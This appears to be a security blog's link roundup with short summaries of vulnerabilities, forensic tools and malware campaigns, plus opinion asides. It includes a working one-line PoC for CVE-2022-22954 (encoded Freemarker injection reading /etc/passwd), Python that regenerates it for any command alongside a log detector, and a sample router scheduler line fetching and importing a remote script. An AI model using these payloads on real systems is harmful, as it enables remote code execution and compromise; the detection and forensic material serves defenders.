The widely popular WordPress website builder plugin Elementor, which has over 5 million active installations, has recently released version 3.6.3 which contains an important security fix.
This vulnerability could allow any authenticated user, regardless of their authorization, to change the site title, site logo, change the theme to Elementor’s theme, and worst of all, upload arbitrary files to the site.
The arbitrary file upload vulnerability could allow someone to take over the entire site or perform remote code execution (RCE). Critical vulnerability fixed in elementor Wordpress plugin 3.6.3
Notes
The aim of this blog post was to present a method for reverse engineering an Android application protected by DexGuard using open-source tools, in the context of a real-world example. Using JEB can however speed up the process of deobfuscation, but as far as we know, the most “technical” parts must still be done separately to obtain the decrypted DEX files.
While the device in itself seemed innocuous, it ended up being a great way to gain access to a sensitive network. Stacking layers upon layers of obfuscation doesn’t help against a motivated attacker. Step-by-step guide to reverse an APK protected with DexGuard using Jadx
The AWS VPN Client application is affected by an arbitrary file write as SYSTEM, which can lead to privilege escalation and an information disclosure vulnerability that allows the user’s Net-NTLMv2 hash to be leaked via a UNC path in a VPN configuration file. These vulnerabilities are confirmed to affect version 2.0.0 and have been fixed in version 3.0.0.
A race condition exists during the validation of OpenVPN configuration files. This allows OpenVPN configuration directives outside of the AWS VPN Client’s allowed OpenVPN directives list to be injected into the configuration file before the AWS VPN Client service, which runs as SYSTEM, processes the file. Dangerous directives such as “log”, which allows an arbitrary destination to be specified for writing log files, can be injected by a low-privileged user.
The impact is an arbitrary file write as SYSTEM with partial control over the contents of the file. This can lead to local privilege escalation or denial of service. CVE-2022-25165 - Privilege Escalation to SYSTEM in AWS VPN Client
Sub3 Suite is a research-grade suite of tools for Subdomain Enumeration, OSINT Information gathering & Attack Surface Mapping. Supports both manual and automated analysis on a variety of target types with many available features & tools. For more information check out the documentation. Sub3 Suite - Subdomain Enumeration Suite
→ in reply to @note#1649599561
On 9 April 2022, security vulnerabilities in the NGINX LDAP reference implementation were publicly shared. We have determined that only the reference implementation is affected. NGINX Open Source and NGINX Plus are not themselves affected, and no corrective action is necessary if you do not use the reference implementation. Addressing Security Weaknesses in the NGINX LDAP Reference Implementation
As Microsoft continues to track the high-priority state-sponsored threat actor HAFNIUM, new activity has been uncovered that leverages unpatched zero-day vulnerabilities as initial vectors. The Microsoft Detection and Response Team (DART) in collaboration with the Microsoft Threat Intelligence Center (MSTIC) identified a multi-stage attack targeting the Zoho Manage Engine Rest API authentication bypass vulnerability to initially implant a Godzilla web shell with similar properties detailed by the Unit42 team in a previous blog. Tarrask malware uses scheduled tasks for defense evasion
Note: I don’t see how this got attributed to HAFNIUM, I guess it’s easy for Prism collectors, Chinese letters -> Chinese APT -> DONE. Also I puked a little in my mouth because of the link to Microsoft but the info might be useful to some of my readers.
Beetlebug is a beginner-friendly Capture the Flag Android application that aims to inspire interest in Mobile Application Security. It is geared towards developers, mobile penetration testers and bug hunters. Features include tracking user’s progress, flag completion state, and so much more! Beetlebug - a very insecure Android CTF app

RaidForums, the darknet platform mainly popular with fans of data leaks, was closed and its infrastructure confiscated as a result of Operation TOURNIQUET, a comprehensive law enforcement operation coordinated by Europol to support independent investigations in the United States, the United Kingdom, Sweden, Portugal and Romania.
The forum administrator and two of his accomplices were also arrested. - Indictment
A list of open source web security scanners on GitHub and GitLab (just added), ordered by Stars. It does not provide in-depth analysis - for more analysis or a wider range of tools, see the links below. Open Source web security scanners
POC for CVE-2022-22954, one line GET request that will execute the command cat /etc/passwd.
{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
The URL-encoded part is:
${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
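The same one-liner, rebuilt and then looked for in web server logs. This is an added example, not part of the original PoC: it re-encodes the Freemarker expression exactly as in the GET request above, and then percent-decodes request targets from constructed access log lines (combined log format, placeholder addresses) so that a plain or double-encoded `Execute` payload against the same endpoint is flagged. The endpoint and parameter name are the ones from the PoC; the log lines are constructed for this example.

```python
import re
from urllib.parse import unquote

# Endpoint and parameter are taken from the one-line PoC above; the log lines
# further down are constructed for this example and are not from a real system.
ENDPOINT = "/catalog-portal/ui/oauth/verify"
PARAM = "deviceUdid"


def freemarker_payload(cmd: str) -> str:
    """The decoded Freemarker expression shown above, parameterised on the command."""
    return '${"freemarker.template.utility.Execute"?new()("%s")}' % cmd


def build_request_path(cmd: str, host: str = "{host}") -> str:
    """Rebuild the PoC request: every byte of the payload is %xx-encoded (lowercase hex)."""
    encoded = "".join("%%%02x" % b for b in freemarker_payload(cmd).encode())
    return "%s%s?error=&%s=%s" % (host, ENDPOINT, PARAM, encoded)


def decode_fully(s: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


# Any ${ ... } interpolation that instantiates an object (?new() or the Execute
# class by name). Attackers can vary the class name, so ?new( is matched as well.
SSTI_RE = re.compile(r"\$\{.*?(?:\?new\(|freemarker\.template\.utility\.Execute)", re.I | re.S)

# Combined log format: ip ident user [ts] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_ssti_request(target: str) -> bool:
    return SSTI_RE.search(decode_fully(target)) is not None


def find_ssti_hits(lines):
    """Return (ip, timestamp, decoded target) for each log line carrying the SSTI pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if is_ssti_request(target):
            hits.append((m.group("ip"), m.group("ts"), decode_fully(target)))
    return hits


# Constructed sample log: the PoC, a benign request, and a double-encoded PoC.
_poc = build_request_path("cat /etc/passwd", host="")
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Apr/2022:10:01:02 +0000] "GET %s HTTP/1.1" 400 512' % _poc,
    '203.0.113.5 - - [13/Apr/2022:10:01:03 +0000] "GET %s?error=&%s=abc123 HTTP/1.1" 200 1024'
    % (ENDPOINT, PARAM),
    '198.51.100.7 - - [13/Apr/2022:10:05:44 +0000] "GET %s HTTP/1.1" 400 512'
    % _poc.replace("%", "%25"),
]

if __name__ == "__main__":
    print(build_request_path("id"))
    for ip, ts, target in find_ssti_hits(SAMPLE_LOG):
        print(ip, ts, target)
```

The decoder is bounded to a few rounds on purpose: an unbounded decode loop on attacker-controlled input is its own denial-of-service risk, and three rounds already cover the double-encoding that WAF bypass attempts usually rely on.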
Forensics tool for Mikrotik devices. Search for suspicious properties and weak security points that need to be fixed on the router. RouterOS Scanner
Features:
- Get the version of the device and map it to CVEs
- Check for scheduled tasks
- Look for traffic redirection rules
- Look for DNS cache poisoning
- Look for default ports change
- Look for non-default users
- Look for suspicious files
- Look for proxy, socks and FW rules
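A minimal version of the scheduler, user, DNS, redirection and proxy checks from that feature list, run over a RouterOS `/export` dump. This is an added example and not RouterOS Scanner's own code: it parses the `/section` then `add key=value ...` layout of an export, and the export text itself is constructed for the example (placeholder names and addresses). The assumption that `admin` is the only stock account is marked in the code.

```python
import shlex

# Constructed /export output for this example (not from a real router).
SAMPLE_EXPORT = """\
/user
add name=admin group=full
add name=svc-backup group=full
/system scheduler
add name=update-check interval=1d on-event="/tool fetch url=http://203.0.113.9/u.rsc mode=http dst-path=u.rsc; /import u.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
/ip dns static
add name=login.example.com address=198.51.100.20
/ip firewall nat
add chain=srcnat action=masquerade out-interface=ether1
add chain=dstnat action=dst-nat protocol=tcp dst-port=53 to-addresses=198.51.100.20 to-ports=53
/ip socks
set enabled=yes port=1080
"""

# Assumption: "admin" is the only account present on a stock RouterOS install.
DEFAULT_USERS = {"admin"}


def parse_export(text):
    """Yield (section, verb, {key: value}) for every add/set line of an export."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # "/system scheduler" style section header
            section = line
            continue
        verb, _, rest = line.partition(" ")
        kv = {}
        for tok in shlex.split(rest):      # shlex keeps quoted on-event scripts intact
            key, _, value = tok.partition("=")
            kv[key] = value
        yield section, verb, kv


def triage(text):
    """Return (finding, detail) pairs for the properties the feature list above calls out."""
    findings = []
    for section, verb, kv in parse_export(text):
        if section == "/user" and kv.get("name") not in DEFAULT_USERS:
            findings.append(("non-default user", kv.get("name")))
        elif section == "/system scheduler":
            event = kv.get("on-event", "")
            # A scheduled fetch-and-import is the classic RouterOS persistence pattern.
            if any(s in event for s in ("fetch", "import", "http")):
                findings.append(("scheduler fetch/import", kv.get("name")))
        elif section == "/ip dns static":
            # Static entries override answers served by the router's resolver.
            findings.append(("static DNS override", "%s -> %s" % (kv.get("name"), kv.get("address"))))
        elif section == "/ip firewall nat" and kv.get("action") == "dst-nat":
            findings.append(("traffic redirection",
                             "dst-port %s -> %s" % (kv.get("dst-port"), kv.get("to-addresses"))))
        elif section in ("/ip socks", "/ip proxy") and kv.get("enabled") == "yes":
            findings.append(("proxy enabled", section))
    return findings


if __name__ == "__main__":
    for finding, detail in triage(SAMPLE_EXPORT):
        print("%-24s %s" % (finding, detail))
```

Every static DNS entry is reported rather than scored, because what counts as legitimate depends on the network; the point is to surface them next to the dst-nat rule that redirects port 53 to the same address, which is how the two findings are read together.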
Forensic tool for processing, analyzing and visually presenting Google Chrome artifacts. ForensiX - Google Chrome forensic tool
Features:
- Mounting of volume with Google Chrome data and preserving integrity through the manipulation process
- Suspect profile and behavior estimations
- Browsing history
- Login data (including parsed metadata)
- Autofills
- Downloads (including default download directory, download statistics…)
- Bookmarks
- Favicons (including all subdomains used for respective favicon)
- Cache
- Volume
- Shared database to save potential evidence found by investigators
→ in reply to @_Blue_hornet
Update: We’ve gotten our hands on an experimental exploit for Nginx 1.18. As we’ve been testing it, a handful of companies and corporations have fallen under it.
Cool, a possible Nginx 1.18 zeroday in the wild. More info about it.
As some further analysis is ongoing, the module relating to the LDAP-auth daemon within nginx is affected greatly. ;) Anything that involves LDAP optional logins works as well. This includes Atlassian accounts. Just working out if we can bypass some common WAFs. Default nginx configs seem to be the vulnerable type, or common configs.
Simple JavaScript code that can be used to filter Startup News 💩 entries via specific words. Can be used in the browser console or with Tampermonkey. Just update the words array.
But, of course, best thing is not to visit that shithole.
(function () {
  // Words to hide (matched case-insensitively); edit this array.
  const words = [
    "facebook"
  ];

  filter();

  function filter() {
    // Each story is a <tr class="athing">; the row that follows it holds the subtext.
    const items = document.querySelectorAll(".athing");
    for (const item of items) {
      const text = item.textContent.toUpperCase();
      for (const word of words) {
        if (text.indexOf(word.toUpperCase()) > -1) {
          console.log("Filtering " + text + " (" + word + ")");
          // Hide the subtext row as well; nextSibling may not be an element, so ignore errors.
          try {
            item.nextSibling.style.display = "none";
          } catch (err) {
          }
          item.style.display = "none";
          break;
        }
      }
    }
  }
})();

Recently, we’ve identified a new version of SolarMarker, a malware family known for its infostealing and backdoor capabilities, mainly delivered through search engine optimization (SEO) manipulation to convince users to download malicious documents.
Some of SolarMarker’s capabilities include the exfiltration of auto-fill data, saved passwords and saved credit card information from victims’ web browsers. Besides capabilities typical for infostealers, SolarMarker has additional capabilities such as file transfer and execution of commands received from a C2 server. New SolarMarker (Jupyter) Campaign Demonstrates the Malware’s Changing Attack Patterns

On April 4 2022, the Cybersecurity & Infrastructure Security Agency (CISA) added CVE-2021-45382 to its known exploited vulnerabilities catalog. But since the affected products have reached end of life (EOL), the advice is to disconnect them, if still in use. CISA advises D-Link users to take vulnerable routers offline
The future is outside the internet, in DIY communications and life projects. Stop wasting too much time on what is now a corporate “global platform”, anything that is linked to the socialist-capitalist system will always eventually become “platformised” and commercialised.
Slowly but surely, the Internet is changing into a “customer point of service” where the main function is to interact with the corporations and/or regime services. The future obviously is outside the Internet, computation is not somehow a subset of the Internet, it is the other way around.
The Internet is just a platform and a specific communications protocol; it can be recreated, improved, and will be. No need to get emotionally attached, so maybe it’s time to let it go already.
ForcePoint One DLP EndPoint lacks tamper protection allowing attackers to disable the product, raise privileges and establish persistence on the machine. Tampering With ForcePoint One DLP EndPoint